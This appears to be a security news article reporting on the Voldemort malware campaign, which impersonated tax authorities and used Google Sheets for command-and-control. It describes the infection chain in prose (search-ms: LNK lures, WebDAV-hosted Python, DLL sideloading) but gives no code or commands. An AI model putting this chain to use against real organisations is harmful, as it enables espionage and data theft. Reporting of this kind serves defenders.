Voldemort Malware
Cybersecurity researchers have identified a new malware campaign that uses Google Sheets as a Command-and-Control (C2) platform.
Detected by researchers in August 2024, the attack campaign masquerades as tax authorities from Europe, Asia, and the U.S. to target more than 70 organizations worldwide. The attackers use a custom tool called Voldemort, designed to collect information and deploy additional malware.
The targeted sectors include insurance, aerospace, transportation, academia, finance, technology, industrial, healthcare, automotive, hospitality, energy, government, media, manufacturing, telecom and social benefit organizations. Although the cyber espionage campaign has not been linked to a specific threat actor, it is estimated that up to 20,000 emails have been sent in these attacks.
Table of Contents
Initial Compromise Vector Exploited by Attackers
The discovered emails purport to be from tax authorities in the U.S., U.K., France, Germany, Italy, India, and Japan, informing recipients of updates to their tax filings and prompting them to click on Google AMP Cache URLs that direct them to an intermediary landing page.
This page checks the User-Agent string to determine if the user's operating system is Windows. If it is, the page uses the search-ms: URI protocol handler to present a Windows shortcut (LNK) file disguised as a PDF using Adobe Acrobat Reader in an attempt to deceive the victim into opening it.
If the LNK file is executed, it triggers PowerShell to run Python.exe from a WebDAV share (\library), passing a Python script located on another share (\resource) on the same server as an argument.
How the Voldemort Malware is Deployed on Compromised Systems
This method allows Python to execute the script without saving any files to the computer, with dependencies being directly loaded from the WebDAV share.
The Python script is programmed to collect system information and transmit it as a Base64-encoded string to a domain controlled by the attackers. Afterward, it displays a decoy PDF to the user and downloads a password-protected ZIP file from OpenDrive.
The ZIP archive contains two files: a legitimate executable, 'CiscoCollabHost.exe,' which is vulnerable to DLL sideloading, and a malicious DLL file, 'CiscoSparkLauncher.dll' (known as Voldemort), which is sideloaded by the executable.
Capabilities of the Voldemort Malware Threat
Voldemort is a custom backdoor written in C that comes with capabilities for information gathering and loading next-stage payloads, with the malware utilizing Google Sheets for C2, data exfiltration and executing commands from the operators.
Researchers described the activity as aligned to Advanced Persistent Threats (APT) but carrying cybercrime traits owing to the use of techniques popular in the e-crime landscape.
Threat actors abuse file schema URIs to access external file-sharing resources for malware staging, specifically WebDAV and Server Message Block (SMB). This is done by using the schema' file://' and pointing to a remote server hosting the threatening content.
This approach has been increasingly prevalent among malware families that act as initial access brokers (IABs), such as Latrodectus, DarkGate and XWorm.
The Goal of the Attacker Remains Unknown
The harmful campaign has been deemed unusual, suggesting that the threat actors may have initially targeted a broad range of potential victims before narrowing their focus to a select group. It is also possible that the attackers, who appear to possess varying levels of technical expertise, intended to compromise multiple organizations.
Although many aspects of the campaign resemble typical cybercriminal activities, we believe it is likely an espionage effort aimed at achieving as-yet-unknown objectives. The campaign's blend of advanced and clever tactics, combined with some basic techniques, complicates the assessment of the threat actor's capabilities and makes it challenging to determine their ultimate goals with high confidence.